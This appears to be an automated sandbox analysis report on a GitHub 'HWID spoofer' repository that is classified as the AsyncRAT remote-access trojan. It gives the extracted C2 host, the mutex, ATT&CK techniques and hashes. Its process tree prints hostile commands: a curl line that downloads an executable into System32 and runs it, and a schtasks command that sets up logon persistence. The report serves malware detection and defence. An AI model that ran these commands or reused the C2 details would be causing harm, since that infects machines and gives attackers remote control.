asyncrat | hxxps://github[.]com/SkarSys/skar-hwid-woofer

Analysis

max time kernel
62s
max time network
66s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
18-11-2024 15:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/SkarSys/skar-hwid-woofer

Score

10^/10

asyncrat default discovery rat

Malware Config

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

hmnms.duckdns.org:2035

Mutex

gr4g4guhuhuie3hfgggtttu3hf33efffrfrgrgrg3f

Attributes

delay
1
install
true
install_file
Update.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x00280000000452dc-361.dat	family_asyncrat

Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000\Control Panel\International\Geo\Nation	boot_cnfg_x32.exe

Executes dropped EXE 3 IoCs

pid	Process
548	boot_cnfg_x32.exe
5372	Update.exe
2976	boot_cnfg_x32.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
83	raw.githubusercontent.com
84	raw.githubusercontent.com
106	raw.githubusercontent.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\boot_cnfg_x32.exe	curl.exe
File created	C:\Windows\System32\boot_cnfg_x32.exe	curl.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20241118150418.pma	setup.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\742584a1-59db-4e8a-ba6f-bb2f7d42e678.tmp	setup.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5088	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1361837696-2276465416-1936241636-1000_Classes\Local Settings	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5196	schtasks.exe

Suspicious behavior: EnumeratesProcesses 30 IoCs

pid	Process
3976	msedge.exe
3976	msedge.exe
1508	msedge.exe
1508	msedge.exe
476	msedge.exe
476	msedge.exe
2648	identity_helper.exe
2648	identity_helper.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe
548	boot_cnfg_x32.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	548	boot_cnfg_x32.exe
Token: SeDebugPrivilege	5372	Update.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe
1508	msedge.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
5976	usermode.exe
5380	usermode.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1508 wrote to memory of 1152	1508	msedge.exe	81
PID 1508 wrote to memory of 1152	1508	msedge.exe	81
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 4088	1508	msedge.exe	82
PID 1508 wrote to memory of 3976	1508	msedge.exe	83
PID 1508 wrote to memory of 3976	1508	msedge.exe	83
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84
PID 1508 wrote to memory of 3620	1508	msedge.exe	84

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

cURL User-Agent 2 IoCs

Uses User-Agent string associated with cURL utility.

description	flow	ioc
HTTP User-Agent header	106	curl/8.7.1
HTTP User-Agent header	84	curl/8.7.1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://github.com/SkarSys/skar-hwid-woofer
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffbb5ce46f8,0x7ffbb5ce4708,0x7ffbb5ce4718
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
  2⤵
  PID:3620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:1
  2⤵
  PID:4572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
  2⤵
  PID:2952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6076 /prefetch:8
  2⤵
  PID:3840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6112 /prefetch:1
  2⤵
  PID:116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3452 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6444 /prefetch:1
  2⤵
  PID:2672
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6684 /prefetch:8
  2⤵
  PID:4428
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
  2⤵
  - Drops file in Program Files directory
  PID:1960
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x248,0x24c,0x250,0x228,0x254,0x7ff699925460,0x7ff699925470,0x7ff699925480
    3⤵
    PID:1172
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6684 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6712 /prefetch:1
  2⤵
  PID:5524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2728 /prefetch:1
  2⤵
  PID:5712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,6461229748766649265,17754598878130888555,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1912 /prefetch:1
  2⤵
  PID:5724

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2692

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3744

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4500

C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe
"C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe" C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\skardrv.sys
1⤵
- Suspicious use of SetWindowsHookEx
PID:5976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
  2⤵
  PID:6096
- - C:\Windows\system32\curl.exe
    curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe
    3⤵
    - Drops file in System32 directory
    PID:6116
- - C:\Windows\System32\boot_cnfg_x32.exe
    C:\\Windows\\System32\\boot_cnfg_x32.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"' & exit
      4⤵
      PID:2776
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Update" /tr '"C:\Users\Admin\AppData\Roaming\Update.exe"'
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5196
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6F20.tmp.bat""
      4⤵
      PID:4124
    - - C:\Windows\system32\timeout.exe
        
        timeout 3
        5⤵
        Delays execution with timeout.exe
        
        PID:5088
    - - C:\Users\Admin\AppData\Roaming\Update.exe
        
        "C:\Users\Admin\AppData\Roaming\Update.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5372
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  PID:2684
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe" MD5
    3⤵
    PID:4460
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:5228
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:5232

C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe
"C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe"
1⤵
- Suspicious use of SetWindowsHookEx
PID:5380
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe >nul 2>&1 && C:\\Windows\\System32\\boot_cnfg_x32.exe
  2⤵
  PID:2800
- - C:\Windows\system32\curl.exe
    curl https://raw.githubusercontent.com/SkarSys/SkarCrypter/main/SkarCrxpter/obj/kdmapper_release.exe --output C:\\Windows\\System32\\boot_cnfg_x32.exe
    3⤵
    - Drops file in System32 directory
    PID:4772
- - C:\Windows\System32\boot_cnfg_x32.exe
    C:\\Windows\\System32\\boot_cnfg_x32.exe
    3⤵
    - Executes dropped EXE
    PID:2976
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
  2⤵
  PID:2688
- - C:\Windows\system32\certutil.exe
    certutil -hashfile "C:\Users\Admin\Desktop\skar-hwid-woofer-main\um\usermode\x64\Release\usermode.exe" MD5
    3⤵
    PID:3728
- - C:\Windows\system32\find.exe
    find /i /v "md5"
    3⤵
    PID:1832
- - C:\Windows\system32\find.exe
    find /i /v "certutil"
    3⤵
    PID:3196

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\boot_cnfg_x32.exe.log

Filesize
425B

MD5
822f6384df6d1671168631e912dd7a4c

SHA1
972aacac112d14ea63c9d33b57ecd402e67a5f19

SHA256
5f50faf2e5bbac2ce5423530952c977e965d60dfb6920a5cce5a707bac630bc4

SHA512
3c03b3c90b551c7febce56406b48e5e4022e7128bfd3a283ec0e3dd952575649af3428b514fb8a312358eb643d3a4f3f4f747a16c29b8863f5367fffe11a9fbf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a134f1844e0964bb17172c44ded4030f

SHA1
853de9d2c79d58138933a0b8cf76738e4b951d7e

SHA256
50f5a3aaba6fcbddddec498e157e3341f432998c698b96a4181f1c0239176589

SHA512
c124952f29503922dce11cf04c863966ac31f4445304c1412d584761f90f7964f3a150e32d95c1927442d4fa73549c67757a26d50a9995e14b96787df28f18b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
78bc0ec5146f28b496567487b9233baf

SHA1
4b1794d6cbe18501a7745d9559aa91d0cb2a19c1

SHA256
f5e3afb09ca12cd22dd69c753ea12e85e9bf369df29e2b23e0149e16f946f109

SHA512
0561cbabde95e6b949f46deda7389fbe52c87bedeb520b88764f1020d42aa2c06adee63a7d416aad2b85dc332e6b6d2d045185c65ec8c2c60beac1f072ca184a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
74bca5f5a8439030ce759f5240f31e79

SHA1
f20e1be679591fefcbc8147b9bb8a515e339eb7d

SHA256
8a90983ade558a279134c33db39aac51e77b7539fcd451a198c1d2868a03479b

SHA512
c12e1ff7fe060a90fb18d8f097cf4362256e3de62b34296a2b29b3db976cf51024facae571c7c7fe9357adba7e0e71502d9611632cadd05d25d21aff063ebada

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
924652e5c94b42797ce60beaa132e4df

SHA1
cb6bd014e3767689a2f456368720fdb18c577693

SHA256
ed063476509d0069a064a1dc1532ebd0475f20b53860655a167568bf544904e6

SHA512
c34dfda896968ec4ae6220cf0f11c201d460f393750ca328ce2c615d873bcc4cfec071eff47023b7c766343c95ea85465fd0335b178f44e14643e53f7311957a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico

Filesize
70KB

MD5
e5e3377341056643b0494b6842c0b544

SHA1
d53fd8e256ec9d5cef8ef5387872e544a2df9108

SHA256
e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25

SHA512
83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
051c3abf82ca5211ee8e247e720d41b2

SHA1
6e7fa02e563477151bed97cb2431eecb8add938a

SHA256
5ad024b437ae96ffee8be6cf7b4a83d185317e333cfc1753dc5e1ebe981e2683

SHA512
b1108cf62f47972fa1c612ac44f6f825e04c504f08ed534f76869c6e981e9d66a6c2c1c60e42e7a54dc28a80b894219d2d0a7c1084d01e56e61a843f861a99bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a743426bcd82c591dc1df9f56038e056

SHA1
d46663dd6ee1c3c7a40b9955fbf6cc9fafe7a1a0

SHA256
87fdd78d10ce4ced039ce6f6b5d92acb58348b4cce20b63abea402a4e823ddee

SHA512
956a88bcc8070798067ee49985958beca0a979547e81ee6d2735f5ee24e438c7c1d403bcf124cade7dd87660f7e50138dad1afb64bfe1aa29d097caf8ac8581e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
16af206245281b65c9f018dcbc19b75a

SHA1
415e560c7f1d497015f4f5aed3005f8be26050e8

SHA256
b5479efcdb40366d5006e17887fffa34bb59a3f3a7a42049a701f34e5e39eac0

SHA512
2cc8ff6b8645ed8ce9320a96a557e03e315e27f98c70177e2f62a978576b5b6f5a2cad21fc21f53fc03d4fbd3adf7db5b6cfd76fab57feedc708e13363bbd22c

Download Submit
